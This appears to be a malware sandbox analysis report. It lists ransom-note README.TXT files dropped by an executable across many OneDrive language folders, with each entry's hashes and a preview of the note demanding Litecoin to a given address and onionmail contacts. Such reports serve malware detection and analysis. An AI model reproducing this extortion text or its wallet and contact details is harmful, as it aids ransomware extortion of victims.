                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\sv\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\ta\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\te\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\tg\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\th\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\ti\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\tn-ZA\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\tr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\tt\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\tzdata\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\ug\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\uk\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\ur\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\vi\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\wo\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\xh-ZA\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
